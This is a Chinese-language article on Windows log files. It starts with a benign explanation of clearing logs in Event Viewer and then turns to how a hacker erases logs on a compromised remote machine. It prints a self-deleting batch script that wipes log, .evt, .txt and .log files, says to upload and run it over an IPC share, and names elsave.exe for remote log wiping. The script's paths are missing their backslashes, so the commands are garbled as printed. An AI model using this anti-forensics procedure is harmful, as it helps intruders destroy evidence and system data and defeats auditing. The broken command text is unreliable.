系統的日誌檔是一些檔系統的集合,依靠建立起的各種數據的日誌檔而存在。日誌對於系統安全的作用是顯而易見的,無論是網路管理員還是駭客都非常重視日誌,一個有經驗的管理員往往能夠迅速通過日誌瞭解到系統的安全性能,而一個聰明的駭客會在入侵成功後迅速清除掉對自己不利的日誌 Windows系統的日誌檔有應用程式日誌、安全日誌、系統日誌等,它們默認的地址為:%systemroot%system32config。當然有的管理員為了更好地保存系統日誌檔,往往將這些日誌檔的地址進行重新的定位,其中在EVENTLOG下麵有很多子表,在裏面可查到以上日誌的定位目錄。
如果用戶想要清除自己系統中的日誌檔,首先需要用管理員帳號登錄Windows系統,接著在“控制面板”中進入“管理工具”,再雙擊裏面的“事件查看器”。然後選擇打開我們需要清除的日誌檔,比如用戶想清除安全日誌,可以右鍵點擊“安全性”選項,在彈出的菜單中選擇“屬性”命令。接下來在彈出的對話框中,點擊下麵“清除日誌”按鈕就可以清除了。
剛剛介紹了對於本地的日誌檔的清除,但是如果是一名駭客,入侵系統成功後第一件事便是清除日誌。駭客會使用兩個辦法來清除遠程電腦上的日誌檔。其中一是自己編寫批處理檔來解決,編寫一個能清除日誌的批處理非常簡單:
@del c:winntsystem32logfiles*.*
@del c:winntsystem32config*.evt
@del c:winntsystem32dtclog*.*
@del c:winntsystem32*.log
@del c:winntsystem32*.txt
@del c:winnt*.txt
@del c:winnt*.log
@del c:dellog.bat
把上面的內容保存為dellog.bat備用。接著通過IPC共用連接到遠程電腦上,將這個批處理檔上傳到遠程電腦系統並執行,即可清除肉雞上的日誌檔。
另外,清除日誌檔還可以借助第三方軟體,比如小榕的elsave.exe就是一款可以清除遠程以及本地系統中系統日誌、應用程式日誌、安全日誌的軟體。elsave.exe使用起來很簡單,首先還是利用管理員帳號建立IPC連接,接著在命令行下執行清除命令,這樣就可以刪除這些系統中的網路日誌檔。 |
